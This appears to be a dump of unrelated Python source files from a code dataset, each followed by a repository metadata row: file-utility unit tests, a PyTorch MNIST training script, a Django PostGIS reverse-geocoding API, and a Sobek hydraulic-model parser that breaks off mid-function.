            temp_file_path = temp_file.name
        expected_file_size = len(file_content)
        self.assertEqual(ValkyrieTools.getFileSize(temp_file_path), expected_file_size)
    def test_getFileEdit(self):
        with tempfile.NamedTemporaryFile(delete=False) as temp_file:
            temp_file_path = temp_file.name
        # Sleep so the mtime is clearly in the past before formatting it.
        time.sleep(1)
        expected_edit_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(os.path.getmtime(temp_file_path)))
        self.assertEqual(ValkyrieTools.getFileEdit(temp_file_path), expected_edit_time)
    def test_getFileList(self):
        # Expect a recursive listing with forward-slash separators.
        temp_dir = tempfile.mkdtemp()
        os.makedirs(os.path.join(temp_dir, 'subdir'))
        with tempfile.NamedTemporaryFile(dir=temp_dir) as temp_file1:
            with tempfile.NamedTemporaryFile(dir=os.path.join(temp_dir, 'subdir')) as temp_file2:
                expected_file_list = [temp_file1.name.replace("\\", "/"), temp_file2.name.replace("\\", "/")]
                self.assertEqual(ValkyrieTools.getFileList(temp_dir), expected_file_list)
# Allow running this test module directly (``python test_tools.py``).
if __name__ == '__main__':
    unittest.main()
| ValkyFischer/ValkyrieUtils | unittests/test_tools.py | test_tools.py | py | 7,154 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "Tools.ValkyrieTools.isFloat",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "Tools.ValkyrieTools",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "T... |
31044290128 | import torch
from torch.autograd import Function
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import time
import numpy as np
# Force determinism: fixed seeds plus deterministic cuDNN kernels so runs
# are reproducible (benchmark autotuning is disabled for the same reason).
#Force Determinism
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(0)
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
input_size = 784      # 28x28 MNIST images, flattened
hidden_size = 500
num_classes = 10
num_epochs = 1
batch_size = 50000    # near full-batch training (MNIST train set is 60k)
learning_rate = 0.00005
# MNIST dataset (downloaded on first run)
train_dataset = torchvision.datasets.MNIST(root='../../data',
                                           train=True,
                                           transform=transforms.ToTensor(),
                                           download=True)
test_dataset = torchvision.datasets.MNIST(root='../../data',
                                          train=False,
                                          transform=transforms.ToTensor())
# Data loader; shuffle=False keeps batch order deterministic across runs.
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
                                           batch_size=batch_size,
                                           shuffle=False)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
                                          batch_size=batch_size,
                                          shuffle=False)
# All-zero masks sized like the input (784) and hidden (500) layers; they are
# placeholders (adding them is a no-op) — presumably scaffolding for masking
# experiments. TODO confirm intended use.
rand_mask = torch.zeros(784)
rand_mask2 = torch.zeros(500)
class Linear(nn.Module):
    """Fully connected layer that routes its forward/backward pass through the
    custom autograd ``MyFunction`` instead of ``torch.nn.functional.linear``.

    Mirrors ``nn.Linear``'s interface: ``weight`` has shape
    ``(output_features, input_features)``; ``bias`` is optional.
    """

    def __init__(self, input_features, output_features, bias=True):
        super(Linear, self).__init__()
        self.input_features = input_features
        self.output_features = output_features
        # nn.Parameter registers the tensor as a module parameter so it shows
        # up in .parameters() and is moved by .to()/.cuda().
        self.weight = nn.Parameter(torch.Tensor(output_features, input_features))
        if bias:
            self.bias = nn.Parameter(torch.Tensor(output_features))
        else:
            # Register the optional parameter as None so the state dict stays
            # consistent even without a bias.
            self.register_parameter('bias', None)
        # Simple uniform initialisation (not fan-in aware).
        self.weight.data.uniform_(-0.1, 0.1)
        # BUGFIX: the original tested ``bias is not None`` on the *bool*
        # argument (always true), so ``bias=False`` crashed on ``None.data``.
        if self.bias is not None:
            self.bias.data.uniform_(-0.1, 0.1)

    def forward(self, input):
        # Delegate to the custom autograd Function defined below.
        return MyFunction.apply(input, self.weight, self.bias)

    def extra_repr(self):
        # BUGFIX: the original referenced self.in_features/self.out_features,
        # attributes that were never set, so repr() raised AttributeError.
        return 'in_features={}, out_features={}, bias={}'.format(
            self.input_features, self.output_features, self.bias is not None
        )
# Inherit from Function
class MyFunction(Function):
    """Custom autograd Function computing ``input @ weight.T (+ bias)``.

    The ``rand_mask`` added in forward is all zeros, so the extra add/mm/sub
    steps cancel exactly and the result equals a plain affine transform —
    presumably scaffolding for data-masking experiments (see the commented
    mask code). TODO confirm intended use.
    """
    # Note that both forward and backward are @staticmethods
    @staticmethod
    # bias is an optional argument
    def forward(ctx, input, weight, bias=None):
        # Zero mask: input + 0 == input, and the correction below subtracts
        # the (zero) mask's contribution again.
        rand_mask = torch.zeros(input.shape)
        #weight_rand_mask = torch.ones(weight.shape)
        # Save the *unmasked* tensors for the backward pass.
        ctx.save_for_backward(input, weight, bias)
        input = input + rand_mask
        #weight = weight + weight_rand_mask
        output = input.mm(weight.t())
        rand_mask = rand_mask.mm(weight.t())
        output = output - rand_mask #- weight_rand_mask
        if bias is not None:
            #bias_rand_mask = torch.ones(output.shape)
            #bias = bias + bias_rand_mask
            output += bias.unsqueeze(0).expand_as(output)
            #output = output - bias_rand_mask
        #print("Forward Output: ")
        #print(output)
        #time.sleep(5)
        return output
    # This function has only a single output, so it gets only one gradient
    @staticmethod
    def backward(ctx, grad_output):
        # This is a pattern that is very convenient - at the top of backward
        # unpack saved_tensors and initialize all gradients w.r.t. inputs to
        # None. Thanks to the fact that additional trailing Nones are
        # ignored, the return statement is simple even when the function has
        # optional inputs.
        input, weight, bias = ctx.saved_tensors
        grad_input = grad_weight = grad_bias = None
        # These needs_input_grad checks are optional and there only to
        # improve efficiency. If you want to make your code simpler, you can
        # skip them. Returning gradients for inputs that don't require it is
        # not an error.
        if ctx.needs_input_grad[0]:
            grad_input = grad_output.mm(weight)
        if ctx.needs_input_grad[1]:
            grad_weight = grad_output.t().mm(input)
        if bias is not None and ctx.needs_input_grad[2]:
            grad_bias = grad_output.sum(0)
        #print("Grad_input: ")
        #print(grad_input)
        #time.sleep(5)
        return grad_input, grad_weight, grad_bias
# Fully connected neural network with one hidden layer
class NeuralNet(nn.Module):
    """Five-layer fully connected network (input -> 4x hidden -> classes)
    built from the custom ``Linear`` layer, with tanh between layers.
    """

    def __init__(self, input_size, hidden_size, num_classes):
        super(NeuralNet, self).__init__()
        self.fc1 = Linear(input_size, hidden_size)
        self.fc2 = Linear(hidden_size, hidden_size)
        self.fc3 = Linear(hidden_size, hidden_size)
        self.fc4 = Linear(hidden_size, hidden_size)
        self.fc5 = Linear(hidden_size, num_classes)
        # The original re-assigned self.tanh once per layer; Tanh is stateless
        # and parameter-free, so one shared instance is equivalent.
        self.tanh = nn.Tanh()

    def forward(self, x):
        out = self.tanh(self.fc1(x))
        out = self.tanh(self.fc2(out))
        out = self.tanh(self.fc3(out))
        out = self.tanh(self.fc4(out))
        # No activation on the output layer: raw logits for CrossEntropyLoss.
        return self.fc5(out)
model = NeuralNet(input_size, hidden_size, num_classes).to(device)
# Loss and optimizer (plain SGD, no momentum/decay/nesterov)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, dampening=0, weight_decay=0, nesterov=False)
# Train the model
total_step = len(train_loader)
for epoch in range(num_epochs):
    for i, (images, labels) in enumerate(train_loader):
        # Move tensors to the configured device; flatten 28x28 -> 784
        images = images.reshape(-1, 28*28).to(device)
        labels = labels.to(device)
        #rand_mask = torch.ones(784)
        #rand_mask2 = torch.ones(500)
        #for k in images:
        # k = torch.add(k, rand_mask)
        outputs = model(images)
        loss = criterion(outputs, labels)
        # Backward and optimize
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        if (i+1) % 100 == 0:
            print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
                   .format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# Test the model
# In test phase, we don't need to compute gradients (for memory efficiency)
with torch.no_grad():
    correct = 0
    total = 0
    for images, labels in test_loader:
        images = images.reshape(-1, 28*28).to(device)
        labels = labels.to(device)
        outputs = model(images)
        # argmax over the class dimension gives the predicted label
        _, predicted = torch.max(outputs.data, 1)
        total += labels.size(0)
        correct += (predicted == labels).sum().item()
    print('Accuracy of the network on the 10000 test images: {} %'.format(100 * correct / total))
# Save the model checkpoint
torch.save(model.state_dict(), 'model.ckpt')
| RyanKarl/SGX_NN_Training_and_Inference | examples/mnist/test_main.py | test_main.py | py | 7,871 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.manual_seed",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.backends",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.backends",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "numpy.rando... |
25730149556 | # -*- coding: utf-8 -*-
from django.shortcuts import render
import psycopg2
import psycopg2.extras
import json
from django.http import HttpResponse
from django.http import HttpResponseServerError
from django.http import HttpResponseBadRequest
from .dicttoxml import DictToXML
def index(request):
    """Render the landing page showing the release date of the BEV data.

    Falls back to a JSON 500 response when the database is unreachable.
    """
    try:
        connection = psycopg2.connect(database="gis")
        cur = connection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
        cur.execute("SELECT date FROM bev_date;")
        rows = cur.fetchall()
        date = rows[0]['date'].strftime('%d.%m.%Y')
    except Exception:
        payload = {
            "status": "server_error",
            "message": "The web application was unable to connect to the database. Please inform the site "
                       "administrator about this issue."
        }
        return HttpResponseServerError(json.dumps(payload), content_type="application/json")
    return render(request, context={'date': date}, template_name='index.html')
def is_float(value):
    """Return True when ``float(value)`` succeeds, False on a ValueError.

    Note: a TypeError (e.g. ``is_float(None)``) is deliberately not caught,
    matching the original behaviour for non-string/non-numeric input.
    """
    try:
        float(value)
    except ValueError:
        return False
    return True
def reverse_geocode(request, format):
    """Return the BEV addresses closest to a coordinate as JSON or XML.

    GET parameters:
        lat, lon -- query coordinate, expressed in the CRS given by ``epsg``
        epsg     -- spatial reference system id (default "4326"); must exist
                    in PostGIS' ``spatial_ref_sys`` table
        distance -- search radius (integer 0..100, default 30)
        limit    -- maximum number of results (integer 1..10, default 5)

    *format* is "json" or "xml" and selects the serialisation of both the
    results and any error payload.
    """
    default_distance = 30
    max_distance = 100
    default_limit = 5
    max_limit = 10
    # Get the HTTP GET parameters and use default values where it makes sense.
    # BUGFIX: fall back to *string* defaults. QueryDict.get() returns the
    # default object unchanged, and the original int defaults made the
    # ``.isdigit()`` validation below raise AttributeError (HTTP 500)
    # whenever the parameter was omitted.
    lat = request.GET.get("lat")
    lon = request.GET.get("lon")
    epsg = request.GET.get("epsg", "4326")
    distance = request.GET.get("distance", str(default_distance))
    limit = request.GET.get('limit', str(default_limit))
    # Try to connect
    try:
        conn = psycopg2.connect(
            database="gis"
        )
    except Exception as e:
        result = {
            "status": "server_error",
            "message": "The web application was unable to connect to the database. Please inform the site " +
                       "administrator about this issue."
        }
        return HttpResponseServerError(json.dumps(result), content_type="application/json")
    cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
    # Do basic data validation.
    if format not in ["json", "xml"]:
        result = {
            "status": "bad_request",
            # BUGFIX: message typo "must either by" -> "must either be"
            "message": "The format must either be JSON or XML."
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    if not epsg.isdigit():
        result = {
            "status": "bad_request",
            # BUGFIX: message typo "vaule" -> "value"
            "message": "The EPSG parameter must be an integer value."
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    epsg = int(epsg)
    # The requested EPSG must exist in PostGIS' reference-system catalogue.
    epsg_statement = "SELECT srid from spatial_ref_sys WHERE srid=%s"
    cursor.execute(epsg_statement, (epsg,))
    epsg_result = cursor.fetchall()
    if len(epsg_result) < 1:
        result = {
            "status": "bad_request",
            "message": "EPSG %s is not supported or does not exist. Try 4326!" % epsg
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    if not distance.isdigit() or (int(distance) > max_distance) or (int(distance) < 0):
        result = {
            "status": "bad_request",
            "message": "The distance value must be an integer between 0 and %s." % max_distance
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    if not limit.isdigit() or (int(limit) > max_limit) or (int(limit) < 1):
        result = {
            "status": "bad_request",
            "message": "The limit parameter must be an integer between 1 and %s." % max_limit
        }
        return HttpResponseBadRequest(get_response_content(result, format), content_type=get_content_type(format))
    # Get the data release date and format it.
    try:
        cursor.execute("SELECT date FROM bev_date;")
        sql_result = cursor.fetchall()
        date = sql_result[0]['date']
    except Exception as e:
        result = {
            "status": "server_error",
            "message": "Could not get the release date of the BEV data."
        }
        return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
    # Parameterised query: user input is passed as bind values, never
    # interpolated into the SQL string.
    statement = """
        select b.municipality, b.locality, b.postcode, b.street, b.house_number, b.house_name, b.address_type,
        ST_Distance(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point) as distance,
        ST_X(ST_Transform(point::geometry, %s)) as lon, ST_Y(ST_Transform(point::geometry, %s)) as lat,
        municipality_has_ambiguous_addresses
        from bev_addresses b
        where ST_DWithin(ST_SetSRID(ST_MakePoint(%s, %s),%s), b.point, %s)
        order by distance
        limit %s
    """
    try:
        cursor.execute(statement, (lon, lat, epsg, epsg, epsg, lon, lat, epsg, distance, limit,))
        sql_result = cursor.fetchall()
        # Convert the result from psycopg2.extras.RealDictRow back to a usual dict.
        dict_result = [dict(row) for row in sql_result]
    except Exception as e:
        result = {
            "status": "server_error",
            "message": "There was a problem querying the database. Please verify that the parameters you submitted " +
                       "(especially the coordinates according to the EPSG you specified) make sense."
        }
        return HttpResponseServerError(get_response_content(result, format), content_type=get_content_type(format))
    result = {"status": "ok",
              "copyright": u"© Österreichisches Adressregister 2017, N 23806/2017 (Stichtagsdaten vom %s)" % (
                  date.strftime('%d.%m.%Y')), "address_date": date.strftime('%Y-%m-%d'), "results": dict_result}
    return HttpResponse(get_response_content(result, format), content_type=get_content_type(format))
def get_response_content(dictionary, format):
    """Serialize *dictionary* for the requested *format*.

    "json" -> json.dumps; "xml" -> DictToXML wrapper; anything else -> "".
    """
    if format == 'xml':
        xml = DictToXML({"reverse_geocode_results": dictionary}, list_mappings={"results": "address"})
        return xml.get_string()
    if format == 'json':
        return json.dumps(dictionary)
    return ""
def get_content_type(format):
    """Map a response format name to its MIME type (text/plain fallback)."""
    mime_by_format = {
        "json": "application/json",
        "xml": "application/xml",
    }
    return mime_by_format.get(format, "text/plain")
| thomaskonrad/bev-reverse-geocoder | bev_reverse_geocoder_api/views.py | views.py | py | 6,488 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "psycopg2.connect",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "psycopg2.extras",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "django.http.HttpResponseServerError",
"line_number": 32,
"usage_type": "call"
},
{
"api_nam... |
73200838504 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 14:15:46 2019
@author: danie
"""
import geopandas as gpd
import pandas as pd
from shapely.geometry import LineString, Point
import os
import re
import numpy as np
import hkvsobekpy as his
import csv
#%%
def __between(value, a, b):
    """Return the substring of *value* between the first *a* and the last *b*.

    Returns "" when either marker is missing or when the span is empty or
    inverted (end of *a* at or past the start of *b*).
    """
    start = value.find(a)
    if start == -1:
        return ""
    end = value.rfind(b)
    if end == -1:
        return ""
    start += len(a)
    return value[start:end] if start < end else ""
def __split_line(lineString, point, buffer=False):
    """Split *lineString* into two coordinate lists at *point*.

    When *buffer* is a number, the point is buffered by that distance before
    the intersection test so near-misses on a segment still match. The split
    point itself is appended to the first part and prepended to the second.
    Raises AssertionError when no segment intersects the point.
    """
    target = point.buffer(buffer) if buffer else point
    coords = lineString.coords
    split_at = None
    for seg_idx in range(len(coords) - 1):
        if LineString(coords[seg_idx : seg_idx + 2]).intersects(target):
            split_at = seg_idx
            break
    assert split_at is not None
    # Make sure to always include the point in the first group
    anchor = Point(point).coords[0]
    return coords[: split_at + 1] + [anchor], [anchor] + coords[split_at + 1 :]
# Sobek integer codes mapped to readable labels, used by the parsers below.
__friction_models = {
    "0": "chezy",
    "1": "manning",
    "2": "strickler (kn)",
    "3": "strickler (ks)",
    "4": "white-colebrook",
    "7": "bos and bijkerk",
}
__flow_boundary_types = {"0": "waterlevel", "1": "discharge"}
__structure_types = {"6": "weir", "7": "orifice", "9": "pump"}
__structure_flow_dirs = {"0": "both", "1": "positive", "2": "negative", "3": "no_flow"}
__pump_control = {"1": "suction", "2": "delivery", "3": "both_sides"}
__control_types = {"0": "time", "1": "hydraulic", "2": "interval", "3": "PID"}
__control_param = {
    "0": "crest_level",
    "1": "crest_width",
    "2": "gate_height",
    "3": "pump_capacity",
}
__profile_types = {}  # placeholder, currently unused
# Regex fragment matching a signed int/float with optional exponent.
# BUGFIX: made this a raw string — "\d" and "\." in a normal string literal
# are invalid escape sequences (DeprecationWarning today, a SyntaxError in
# future Pythons). The resulting pattern text is byte-identical.
__match_num = r"[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?"
# %% read network
def network(path, crs):
    """Read all Sobek network files from *path* (a directory).

    Builds GeoDataFrames in CRS *crs* from:
      - network.tp  : nodes and branch (reach) topology
      - network.cp  : curve points, turned into branch LineString geometry
      - network.ntw : link/object table (CSV) with coordinates and types
      - network.gr  : grid points, split into h-points and v-link segments
      - network.cr / .st / .cn : attach cross-sections, structures and flow
        boundaries to their link and chainage (LINK / LINK_POS)

    Returns a dict with keys "links", "nodes", "objects" and "segments".
    NOTE(review): uses GeoDataFrame.append, which was removed in pandas 2.x —
    this code assumes a pandas 1.x environment.
    """
    links = gpd.GeoDataFrame(
        columns=["ID", "FROM_NODE", "TO_NODE", "geometry"], geometry="geometry"
    )
    nodes = gpd.GeoDataFrame(columns=["ID", "geometry"], geometry="geometry")
    # network.tp: NODE records give point coordinates, BRCH records topology.
    with open(os.path.join(path, "network.tp"), "r") as networkTP:
        for line in networkTP.readlines():
            if line[0:4] == "NODE":
                ident = __between(line, "id '", "' nm")
                x = float(__between(line, "px ", " py"))
                y = float(__between(line, "py ", " node"))
                nodes = nodes.append(
                    {"ID": ident, "geometry": Point(x, y)}, ignore_index=True
                )
            elif line[0:4] == "BRCH":
                ident = __between(line, "id '", "' nm")
                from_node = __between(line, "bn '", "' en")
                to_node = __between(line, "en '", "' al")
                links = links.append(
                    {"ID": ident, "FROM_NODE": from_node, "TO_NODE": to_node},
                    ignore_index=True,
                )
    # open network.cp to define channel geometry
    with open(os.path.join(path, "network.cp"), "r") as networkCP:
        for reach in networkCP.read().split("BRCH")[1:]:
            ident = __between(reach, "id '", "' cp")
            cps = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
            from_node = list(links.loc[links["ID"] == ident, "FROM_NODE"])[0]
            to_node = list(links.loc[links["ID"] == ident, "TO_NODE"])[0]
            # Start the polyline at the from-node's coordinates.
            coord_list = list(
                list(nodes.loc[nodes["ID"] == from_node].geometry)[0].coords
            )
            sumDistance = 0.0
            # Walk the curve-point table: each row is (chainage, angle);
            # convert to a new vertex relative to the previous one.
            # NOTE(review): the "* 2" distance scaling is unexplained — verify
            # against the network.cp format specification.
            for idx, cp in enumerate(cps):
                distance, angle = cp.split()
                distance = (float(distance) - sumDistance) * 2
                angle = np.deg2rad(90 - float(angle))
                x = coord_list[-1][0] + float(distance) * np.cos(angle)
                y = coord_list[-1][1] + float(distance) * np.sin(angle)
                coord_list += [(x, y)]
                sumDistance += distance
            # Snap the last vertex exactly onto the to-node.
            coord_list[-1] = list(
                list(nodes.loc[nodes["ID"] == to_node].geometry)[0].coords
            )[0]
            index = links.loc[links["ID"] == ident].index[0]
            links.at[index, "geometry"] = LineString(coord_list)
    network = {}
    objects = gpd.GeoDataFrame(
        columns=["ID", "TYPE", "LINK", "LINK_POS", "geometry"],
        geometry="geometry",
        crs=crs,
    )
    objects_list = []
    # network.ntw: CSV table; rows up to the "*" sentinel describe links,
    # whose start/end columns also yield the object points.
    with open(os.path.join(path, "network.ntw"), "r") as networkNTW:
        doLinks = True
        for idx, l in enumerate(
            csv.reader(
                networkNTW.readlines(),
                quotechar='"',
                delimiter=",",
                quoting=csv.QUOTE_ALL,
            )
        ):
            if idx > 0:
                if doLinks:
                    if l[0] == "*":
                        doLinks = False
                if doLinks:
                    network.update(
                        {
                            l[0]: {
                                "properties": {
                                    "type": l[4],
                                    "customType": l[5],
                                    "startNode": l[14],
                                    "endNode": l[27],
                                },
                                "lineString": [
                                    [float(l[21]), float(l[22])],
                                    [float(l[34]), float(l[35])],
                                ],
                            }
                        }
                    )
                    if not l[14] in objects_list:
                        objects_list.append(l[14])
                        objects = objects.append(
                            {
                                "ID": l[14],
                                "NAME": l[15],
                                "TYPE": l[19],
                                "geometry": Point([float(l[21]), float(l[22])]),
                            },
                            ignore_index=True,
                        )
                    if not l[27] in objects_list:
                        objects_list.append(l[27])
                        objects = objects.append(
                            {
                                "ID": l[27],
                                "NAME": l[28],
                                "TYPE": l[32],
                                "geometry": Point([float(l[34]), float(l[35])]),
                            },
                            ignore_index=True,
                        )
    h_points = gpd.GeoDataFrame(
        columns=["ID", "geometry"], geometry="geometry", crs=crs
    )
    v_links = gpd.GeoDataFrame(
        columns=["ID", "TYPE", "CUSTOM_TYPE", "FROM_NODE", "TO_NODE", "geometry"],
        geometry="geometry",
        crs=crs,
    )
    # network.gr: grid points per reach; only h-points that also appear in
    # calcpnt.his are kept, and the branch geometry is cut into per-segment
    # v-links between consecutive h-points.
    with open(os.path.join(path, "network.gr"), "r") as networkGR:
        hLocations = his.read_his.ReadMetadata(
            os.path.join(path, "calcpnt.his"), hia_file="auto"
        ).GetLocations()
        for reach in networkGR.read().split("GRID")[1:]:
            ident = __between(reach, "id '", "' ci")
            line = list(links.loc[links["ID"] == ident, "geometry"])[0]
            gridTable = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
            for idx, grid in enumerate(gridTable):
                grid = grid.split()
                h_point = grid[3].replace("'", "")
                if h_point in hLocations: # check if point is ignored by Sobek-core
                    point = (float(grid[5]), float(grid[6]))
                    if h_point not in list(h_points["ID"]):
                        h_points = h_points.append(
                            {"ID": h_point, "geometry": Point(point)}, ignore_index=True
                        )
                    if idx == 0:
                        v_point = grid[4].replace("'", "")
                        Type = network[v_point]["properties"]["type"]
                        customType = network[v_point]["properties"]["customType"]
                        pointFrom = h_point
                    else:
                        pointTo = h_point
                        # Cut the remaining geometry at this h-point; the
                        # first piece becomes the segment, the rest carries on.
                        segment, line = __split_line(
                            LineString(line), Point(point), buffer=0.01
                        )
                        v_links = v_links.append(
                            {
                                "ID": v_point,
                                "TYPE": Type,
                                "CUSTOM_TYPE": customType,
                                "FROM_NODE": pointFrom,
                                "TO_NODE": pointTo,
                                "geometry": LineString(segment),
                            },
                            ignore_index=True,
                        )
                    # Prepare the next segment: it starts at this h-point.
                    v_point = grid[4].replace("'", "")
                    pointFrom = h_point
    # use ID as index
    for df in [links, nodes, objects, v_links]:
        df.index = df["ID"]
    # network.cr: cross-section records -> link id + chainage on the objects.
    with open(os.path.join(path, "network.cr"), "r") as networkCR:
        for line in networkCR:
            if re.match("CRSN", line):
                object_id = re.search(".id '(.*)' nm.", line).group(1)
                objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
                    1
                )
                objects.loc[object_id, "LINK_POS"] = float(
                    re.search(".lc (.*) crsn", line).group(1)
                )
    # network.st: structure records, same LINK/LINK_POS attachment.
    with open(os.path.join(path, "network.st"), "r") as networkST:
        for line in networkST:
            if re.match("STRU", line):
                object_id = re.search(".id '(.*)' nm.", line).group(1)
                objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
                    1
                )
                objects.loc[object_id, "LINK_POS"] = float(
                    re.search(".lc (.*) stru", line).group(1)
                )
    # network.cn: flow-boundary records, same LINK/LINK_POS attachment.
    with open(os.path.join(path, "network.cn"), "r") as networkCN:
        for line in networkCN:
            if re.match("FLBX", line):
                object_id = re.search(".id '(.*)' nm.", line).group(1)
                objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
                    1
                )
                objects.loc[object_id, "LINK_POS"] = float(
                    re.search(".lc (.*) flbx", line).group(1)
                )
    return {
        "links": links.set_crs(crs, inplace=True),
        "nodes": nodes.set_crs(crs, inplace=True),
        "objects": objects.set_crs(crs, inplace=True),
        "segments": v_links.set_crs(crs, inplace=True),
    }
def results(path):
    """Read meta-data from the his result files of a Sobek case.

    Returns a dict with keys "links", "points" and "structures"; each entry
    is None when the corresponding his-file is absent, otherwise a dict with
    the result DataFrame plus its parameters and locations.
    """
    his_files = {
        "links": "reachseg.his",
        "points": "calcpnt.his",
        "structures": "struc.his",
    }
    result = dict.fromkeys(his_files, None)
    for key, file_name in his_files.items():
        his_path = os.path.join(path, file_name)
        if not os.path.exists(his_path):
            continue
        meta_data = his.read_his.ReadMetadata(his_path, hia_file="auto")
        params = meta_data.GetParameters()
        locs = meta_data.GetLocations()
        result[key] = {
            "df": meta_data.DataFrame(),
            "parameters": params,
            "locations": locs,
        }
    return result
def parameters(path):
    """Read parameters from a sobek case.

    *path* is a pathlib.Path to the case directory. Parses:
      - friction.dat : global friction model and value
      - struct.dat / struct.def : structures (weir, orifice, pump) with their
        definition, controller linkage and type-specific attributes
      - profile.dat / profile.def : cross-sections; type-0 profiles become a
        pandas Series of z-levels indexed by signed half-widths

    Returns a dict with keys "friction", "structures", "cross_sections".
    """
    result = dict()
    with path.joinpath("friction.dat").open() as friction_dat:
        result["friction"] = dict()
        for line in friction_dat:
            if re.match(".*BDFR.*", line):
                # Model code sits between 'mf' and ' mt'; the value between
                # 'mt cp 0' and '0 mr'. NOTE(review): assumes a constant
                # (non-tabulated) friction definition — verify BDFR format.
                model = __friction_models[__between(line, 'mf', ' mt').replace(' ', '')]
                value = float(__between(line, 'mt cp 0', '0 mr').replace(' ', ''))
                result['friction']['global'] = {'model': model,
                                                'value': value}
    with path.joinpath('struct.dat').open() as struct_dat:
        structures = dict()
        for line in struct_dat:
            if re.match("STRU", line):
                # One record per structure: id, definition id (dd),
                # controller id (cj) and whether the controller is active (ca).
                struc_id = re.search(".id '(.*)' nm.", line).group(1)
                structures[struc_id] = {}
                structures[struc_id]["def_id"] = re.search(
                    ".dd '(.*)' ca.", line
                ).group(1)
                structures[struc_id]["control_id"] = re.search(
                    "cj '(.*)' ", line
                ).group(1)
                structures[struc_id]["control_active"] = bool(
                    int(re.search(f"ca ({__match_num}) ", line).group(1))
                )
        result["structures"] = structures
    with path.joinpath("struct.def").open() as struct_def:
        # struct.def holds the STDS definition blocks referenced by def_id.
        for stds in struct_def.read().split("stds"):
            if "STDS" in stds:
                def_id = re.search(".id '(.*)' nm.", stds).group(1)
                struc_def = dict()
                struc_def["type"] = __structure_types[
                    re.search(".ty ([0-9]).", stds).group(1)
                ]
                if struc_def["type"] in ["weir", "orifice"]:
                    struc_def["crest_level"] = float(
                        re.search(f".cl ({__match_num}).", stds).group(1)
                    )
                    struc_def["crest_width"] = float(
                        re.search(f".cw ({__match_num}).", stds).group(1)
                    )
                    struc_def["flow_dir"] = __structure_flow_dirs[
                        re.search(f".rt ({__match_num}).", stds).group(1)
                    ]
                    # Combined discharge coefficient: lateral contraction (sc)
                    # times ce (weir) or mu (orifice).
                    if struc_def["type"] == "weir":
                        cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
                        ce = float(re.search(f".ce ({__match_num}).", stds).group(1))
                        struc_def["coefficient"] = ce * cw
                    if struc_def["type"] == "orifice":
                        cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
                        mu = float(re.search(f".mu ({__match_num}).", stds).group(1))
                        struc_def["coefficient"] = mu * cw
                elif struc_def["type"] == "pump":
                    struc_def["control_side"] = __pump_control[
                        re.search(f".dn ({__match_num}).", stds).group(1)
                    ]
                    # Pump stage table: capacity + on/off levels per side.
                    stages = (
                        re.search(".*\nTBLE\n(.*)<\ntble.", stds).group(1).split("<")
                    )
                    stages = [stage.split() for stage in stages]
                    struc_def["pump_stages"] = [
                        {
                            "capacity": float(stage[0]),
                            "suction_on": float(stage[1]),
                            "suction_off": float(stage[2]),
                            "delivery_on": float(stage[3]),
                            "delivery_off": float(stage[4]),
                        }
                        for stage in stages
                    ]
                # Merge the definition into the structure that references it.
                struc_id = next(
                    (
                        st_id
                        for st_id, values in structures.items()
                        if values["def_id"] == def_id
                    ),
                    None,
                )
                if struc_id:
                    result["structures"][struc_id] = {
                        **result["structures"][struc_id],
                        **struc_def,
                    }
                else:
                    print(f"structure definition {def_id} not linked to structure-id")
    with path.joinpath("profile.dat").open() as profile_dat:
        # Map cross-section id -> definition id.
        cross_sections = dict()
        for line in profile_dat:
            if re.match("CRSN", line):
                xs_id = re.search(".id '(.*)' di.", line).group(1)
                cross_sections[xs_id] = re.search(".di '(.*)' rl.", line).group(1)
        result["cross_sections"] = cross_sections.copy()
    with path.joinpath("profile.def").open() as profile_dat:
        for crds in profile_dat.read().split("crds"):
            if "CRDS" in crds:
                def_id = re.search(".id '(.*)' nm.", crds).group(1)
                xs_type = re.search(f".ty ({__match_num}).", crds).group(1)
                crds = crds.replace("\n", "")
                coords = re.search(r".*TBLE(.*)<tble.", crds).group(1).split("<")
                if xs_type == "0":
                    # Tabulated profile: mirror the (z, width) table into a
                    # symmetric Series indexed by signed half-widths.
                    z = np.array([float(coord.split()[0]) for coord in coords])
                    w = np.array([float(coord.split()[1]) for coord in coords])
                    series = pd.Series(
                        data=np.concatenate([np.flip(z), z]),
                        index=np.concatenate([np.flip(-w / 2), w / 2]),
                    )
                else:
